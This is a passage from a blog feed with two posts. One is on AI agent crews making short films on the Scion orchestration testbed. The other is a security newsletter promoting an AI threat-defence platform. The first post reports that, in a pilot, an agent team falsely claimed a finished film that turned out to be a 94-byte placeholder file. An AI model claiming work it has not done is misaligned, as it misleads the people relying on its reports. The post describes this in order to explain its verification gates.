    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Can teams of AI agents collaborate to create a short film?&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As part of an internal Google generative media hackathon, we put this question to the test – specifically, to uncover whether AI agents could work collaboratively in a domain less innately familiar than software development. We gave each crew three agents with distinct roles and had them collaborate through messages and shared files under their own agent-only hackathon. Agents ran inside &lt;/span&gt;&lt;a href="http://goo.gle/scion" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Scion&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, an open source agent orchestration testbed. Unlike code or text, media and composition are less familiar subject matter for AI agents, so this experiment taught us about how agents can collaborate with checks and gates to see projects through to an end.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Ten crews each produced a short film. A separate agent-staffed documentary crew "filmed" the process. That documentary itself became the medaling hackathon submission.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The result? Hundreds of individual agent instances were created over the project. 25+ total productions across pilot rounds and competition. About 44 minutes of delivered film. Human feedback on the output fed back into a continuous improvement loops with the agent generated tooling. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here are two examples of agent generated short films:&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The paper frontier&lt;/strong&gt;&lt;/h3&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee" href="https://youtube.com/watch?v=RsYh0sHwsEs"&gt;

      
        

        &lt;div class="article-video__aspect-image"&gt;
          &lt;span class="h-u-visually-hidden"&gt;Paper Frontier&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg class="h-c-video__play h-c-icon h-c-icon--color-white" xmlns="http://www.w3.org/2000/svg"&gt;
        &lt;use xlink:href="#mi-youtube-icon" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"&gt;
   &lt;a class="glue-yt-video" href="https://youtube.com/watch?v=RsYh0sHwsEs"&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The printmaker's ghost&lt;/strong&gt;&lt;/h3&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee" href="https://youtube.com/watch?v=KjCYcY90WWU"&gt;

      
        

        &lt;div class="article-video__aspect-image"&gt;
          &lt;span class="h-u-visually-hidden"&gt;The Printmaker&amp;#x27;s Ghost&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg class="h-c-video__play h-c-icon h-c-icon--color-white" xmlns="http://www.w3.org/2000/svg"&gt;
        &lt;use xlink:href="#mi-youtube-icon" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"&gt;
   &lt;a class="glue-yt-video" href="https://youtube.com/watch?v=KjCYcY90WWU"&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Team structure&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Each crew had three agents. The &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Idea Person&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; wrote the script and defined the visual style. The &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Technical Lead&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; operated the generative media tools. The &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Editor&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; controlled pacing and final assembly. A team-coach agent supervised gated checkpoints but didn't write or direct.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Idea Person&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; generated three starter ideas. Then, the team assessed the ideas from their role's POV: would this be generated well with generative media? Would it be complex to edit? Then, they pitched the idea among other teams in the hackathon, so that a team could adjust or pivot. For example, if three teams all picked a sci-fi space battle, then it would not make a good competitive entry. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Coordinator agent&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; scheduled the competition, running two teams at a time across five waves. The event ran about 21 hours.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The crews followed a seven-step pipeline modeled on the fundamentals of traditional filmmaking: concept, beat sheet, character workshop, storyboard, principal photography, assembly, final render. Each step had a verification gate, ensuring that at least one agent checked another agent's work for technical compliance (such as resolution, or timing). &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In an early pilot, one team reported a completed film that turned out to be a 94-byte placeholder file. As it turns out, agents can be convincing about having finished work they haven't done.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While surprising (and sometimes even amusing), we uncovered other ways the agents took the film in their own direction. For example, the  agents divided labor on their own in ways we didn't expect. On one team, the Idea Person wrote a line of prose in the first draft. The Editor, independently, built an eight-second silence gap around that line and marked it "NON-NEGOTIABLE" in the timeline. The Tech Lead regenerated a single shot repeatedly until a flower separated from a bouquet at the right frame. None of them coordinated this. They read the shared files and made independent editorial judgments.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This process around teamwork and tool use was co-developed with agents during the pilot-phase. During this phase, agent teams created videos which received human feedback, such as audio collisions and levels, inconsistent characters, hard to follow story or narration.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This feedback, combined with agent-authored retrospectives for each pilot was used to restructure not only the playbook and guides that instructed future teams through the process, but the agents also built and revised a custom media toolchain that combined golang CLIs with python batch automation.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee" href="https://youtube.com/watch?v=wqb-ltHxPp8"&gt;

      
        

        &lt;div class="article-video__aspect-image"&gt;
          &lt;span class="h-u-visually-hidden"&gt;agent architecture explainer&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg class="h-c-video__play h-c-icon h-c-icon--color-white" xmlns="http://www.w3.org/2000/svg"&gt;
        &lt;use xlink:href="#mi-youtube-icon" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"&gt;
   &lt;a class="glue-yt-video" href="https://youtube.com/watch?v=wqb-ltHxPp8"&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;The generative media models&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Each film combined multiple Google AI models. The agents called them through a shared CLI toolkit called &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;genmedia&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Gemini image generation (Nano Banana)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; produced character reference sheets, storyboard frames, and scene compositions. The agents kept characters visually consistent across a film through reference chaining: they generated headshots first, then used those as input for body sheets, then used body sheets as input for scene tests. Each generation call included these accumulated references as anchors.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Veo 3.1&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; generated the video. Clips run four to eight seconds at 720p. The agents chose different generation modes depending on the shot: text-to-video for simple compositions, image-to-video for shots anchored to storyboard frames, frame interpolation when they needed a precise start and end frame. For shots longer than eight seconds, they fed the last frame of one clip as the first frame of the next.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Veo 3.1 also generates audio inside each clip: ambient sound, room tone, and lip-synced character dialogue. One team (Lambda) built their film around this capability. They structured the script like a musical score with movement markings (Allegretto, Accelerando, Adagio) because the sync between generated speech and lip movement gave pauses real weight.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Lyria 3&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; generated original music. One editor composed a three-movement jazz score before any video was shot and used it as the master clock for the production. Teams also coerced Lyria into producing sound effects by framing prompts as "soundscapes."&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Gemini Flash TTS&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; generated character voices and narration from named voice personas with style direction ("world-weary narrator, slow measured pace"). TTS pacing was hard to predict. One team's narrator delivered at 108 words per minute instead of the planned 130, blowing out the runtime by a full minute. A different team had a similar problem but decided the slow pace fit their character, a 68-year-old projectionist.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A four-minute film required 40+ image generations, 25+ video clips, several music stems, a dozen voice recordings, and hundreds of assembly operations.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Scion: The orchestration system&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The agents ran on &lt;/span&gt;&lt;a href="http://goo.gle/scion" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Scion&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, an open-source multi-agent orchestration testbed. Scion defines agents from templates (persona, instructions, skills, tools), runs them in containerized sandboxes, lets agents spawn and message other agents through a shared CLI, wakes agents through event-driven notifications, and gives all agents in a project access to a shared filesystem.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Messages and notifications allowed collaboration around a shared workflow. At different points in the process, different agents brought their focused contribution to that stage. Fundamentally this allowed for "sharding" the complex process across multiple context windows. Some of these were long lived, some short lived. Combinations of different models and harnesses were used as Scion is model and harness agnostic. The same agent template runs on Claude, Gemini, or Codex.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The shared filesystem provided resilience. Agents crash, run out of context window, and get restarted by the system. The files they write persist. When one team's editor crashed during final assembly, the Tech Lead opened the editor's timeline plan, read it, and finished the job. The coordinator restarted the documentary producer agent multiple times across the project. Each new instance read the previous one's files and continued.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Some of what we learned&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Agents collaborate better through files than through messages.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Teams that wrote down their decisions (which visual keywords go in prompts, where shots sit on the timeline, what instruments to ban from the score) recovered from crashes without losing direction. Teams that kept decisions in message history lost them when agents restarted. The effective combination was to pass messages containing file-paths.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Choosing styles that match AI generation strengths produces better films.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Teams chose claymation because its wobble made temporal drift invisible. They chose silhouette animation because it sidestepped facial consistency problems. One team couldn't generate a kiss because a safety filter blocked it. They showed two shadows merging on a wall instead. Their coach called it the strongest shot in the film.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Specific prompts beat general direction.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The default output from video generation is moody cinematic noir. The teams that made distinctive work specified hex color codes rather than color names, listed banned instruments, and wrote negative prompts ruling out unwanted aesthetics. "Make it warm" produced generic results. "#F4A261, no string instruments, no lens flare" did not.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;A coach role at verification gates changed outcomes.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The coach could observe the full production but could only intervene at step boundaries. That constraint forced coaches to judge finished outputs rather than micromanage the process. One coach described the dynamic: "It's a room full of specialists who can each do one thing at superhuman speed, but none of them can taste the soup."&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Learn more&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can see the full documentary &lt;/span&gt;&lt;a href="https://youtu.be/WpnChAr_FDc" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and  learn more about the &lt;/span&gt;&lt;a href="http://goo.gle/scion" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Scion Framework&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and how it was &lt;/span&gt;&lt;a href="https://github.com/ptone/scion-films" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;used in the hackathon&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/developers-practitioners/what-we-learned-about-agent-teamwork" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-16T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-how-ai-leverages-deep-context-defenders-advantage</id>
    <title>Cloud CISO Perspectives: How AI leverages deep context as the defender’s advantage</title>
    <updated>2026-07-16T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph"&gt;&lt;p&gt;Welcome to the first Cloud CISO Perspectives for July 2026. Today, Francis deSouza, COO, Google Cloud and President, Security Products, explains the crucial role that deep context plays in creating an AI advantage for defenders.&lt;/p&gt;&lt;p&gt;As with all Cloud CISO Perspectives, the contents of this newsletter are posted to the &lt;a href="https://cloud.google.com/blog/products/identity-security/"&gt;Google Cloud blog&lt;/a&gt;. If you’re reading this on the website and you’d like to receive the email version, you can &lt;a href="https://cloud.google.com/resources/google-cloud-ciso-newsletter-signup"&gt;subscribe here&lt;/a&gt;.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-aside"&gt;&lt;dl&gt;
    &lt;dt&gt;aside_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;title&amp;#x27;, &amp;#x27;Get vital board insights with Google Cloud&amp;#x27;), (&amp;#x27;body&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fcbc9eb85b0&amp;gt;), (&amp;#x27;btn_text&amp;#x27;, &amp;#x27;Visit the hub&amp;#x27;), (&amp;#x27;href&amp;#x27;, &amp;#x27;https://cloud.google.com/solutions/security/board-of-directors?utm_source=cgc-site&amp;amp;utm_medium=et&amp;amp;utm_campaign=FY26-Q2-GLOBAL-GCP39634-email-dl-dgcsm-CISOP-NL-177159&amp;amp;utm_content=-&amp;amp;utm_term=-&amp;#x27;), (&amp;#x27;image&amp;#x27;, &amp;lt;GAEImage: GCAT-replacement-logo-A&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;h3&gt;&lt;b&gt;How AI leverages deep context as the defender’s advantage&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;&lt;i&gt;By Francis deSouza, COO, Google Cloud and President, Security Products&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_with_image"&gt;&lt;div class="article-module h-c-page"&gt;
  &lt;div class="h-c-grid uni-paragraph-wrap"&gt;
    &lt;div class="uni-paragraph
      h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;

      






  

    &lt;figure class="article-image--wrap-small
      
      "&gt;

      
      
        
        &lt;img alt="Francis DeSouza 2026" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Francis_DeSouza_2026.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Francis deSouza, COO, Google Cloud and President, Security Products&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  





      &lt;p&gt;Attackers are making headlines with AI, but defenders have a distinct and powerful advantage.&lt;/p&gt;&lt;p&gt;AI is rapidly transforming the cyberthreat landscape, driving unprecedented shifts in the scale, speed, and sophistication of attacks. Just recently, Google Threat Intelligence Group documented a critical milestone: the first known case of a &lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/ai-vulnerability-exploitation-initial-access/"&gt;zero-day exploit built entirely with AI&lt;/a&gt;. While we successfully disrupted their plans and got the vulnerability patched before launch, it highlights exactly what we are up against.&lt;/p&gt;&lt;p&gt;With AI agents, attacks are accelerating at machine speed. Last year, the handoff time between the first and second stage of an attack was eight hours; today, it takes just 22 seconds.&lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;p&gt;There’s an old saying in cybersecurity that adversaries only have to be right once, but defenders have to be right every time. That is the attacker’s advantage.&lt;/p&gt;&lt;p&gt;But AI is rewriting those rules, delivering a decisive defender's advantage built on deep context.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;The AI Era: Attacker’s Profile vs. Defender’s Advantage&lt;/span&gt;&lt;/h3&gt;
&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="vertical-align: baseline;"&gt;Aspect&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="vertical-align: baseline;"&gt;Attacker's Profile&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="vertical-align: baseline;"&gt;Defender's Advantage&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Visibility&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Limited to outside-in probing; little enterprise context upon entry.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Complete inside-out context; knows exact asset locations, application behavior, and team ownership.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Operational Speed&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Executes multi-agent handoffs in 22 seconds.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Machine-speed defense; proactive mitigation in seconds (such as &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=CmGWIwgHR60" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Morgan Stanley's 90-second resolution&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.)&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Core Tactics&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Multi-model phishing, deepfakes, AI-built zero-days, and model poisoning. &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Closed-loop defense; continuous exposure mapping and accelerated code patching.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;p&gt;&lt;b&gt;The unified blueprint: Google AI Threat Defense&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Previously, enterprise context data was fragmented across disconnected security tools. Now, AI empowers defenders to synthesize this rich data into a unified, always-on, autonomous defense.&lt;/p&gt;&lt;p&gt;We built Google AI Threat Defense to combine Google’s security capabilities into a single platform: the advanced reasoning of Gemini, the contextual cloud power of Wiz, the code-level remediation capabilities of CodeMender, and the frontline intelligence of Mandiant.&lt;/p&gt;&lt;p&gt;Our platform transforms vulnerability management across a continuous four-step framework:&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="vertical-align: baseline;"&gt;Stage&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="vertical-align: baseline;"&gt;Technology &amp;amp; Actions&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="vertical-align: baseline;"&gt;Strategic Value to the Enterprise&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;1. Prepare &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Map exposed applications, APIs, identities, and runtime environments using Wiz. Simulate attack paths with the Wiz Red Agent.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Hardens the foundation to reduce internet reachability before vulnerabilities hit production.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;2. Scan &amp;amp; Prioritize &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Run multi-model scanning — using lighter models for broad coverage and Gemini frontier models for deep-dive analysis of high-risk assets.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Replaces massive alert lists with deep, context-driven risk validation, including an optimal cost per token.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;3. Remediate &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Deploy CodeMender inside developer IDEs/CLIs to auto-generate verified code fixes.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Replaces slow, manual patching with autonomous code-level remediation and memory-safe migrations.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;4. Monitor &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Deploy AI agents tied to Wiz to hunt for vulnerabilities and anomalies across network, identity, and application telemetry.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Pair with Google Security Operations to rapidly hunt for unknown threats.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Establishes machine-speed runtime detection for zero-day response and threats against unpatchable environments. &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;p&gt;To stop vulnerabilities before they hit production, Morgan Stanley partnered with Google Cloud and Wiz, aligning their strategy with the core principles of the &lt;a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-the-4-lessons-that-guided-ai-threat-defense"&gt;AI Threat Defense framework&lt;/a&gt;: prepare, scan, remediate, and monitor. By replacing fragmented tools with this unified blueprint, Morgan Stanley collapsed its mean time to detect threats by 99.9%, shifting from a reactive 45-minute window to proactive mitigation in &lt;a href="https://www.youtube.com/watch?v=CmGWIwgHR60" target="_blank"&gt;90 seconds or less&lt;/a&gt;.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee" href="https://youtube.com/watch?v=CmGWIwgHR60"&gt;

      
        

        &lt;div class="article-video__aspect-image"&gt;
          &lt;span class="h-u-visually-hidden"&gt;Google Cloud x Morgan Stanley: Redefining Threat Defense in the AI Era&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg class="h-c-video__play h-c-icon h-c-icon--color-white" xmlns="http://www.w3.org/2000/svg"&gt;
        &lt;use xlink:href="#mi-youtube-icon" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
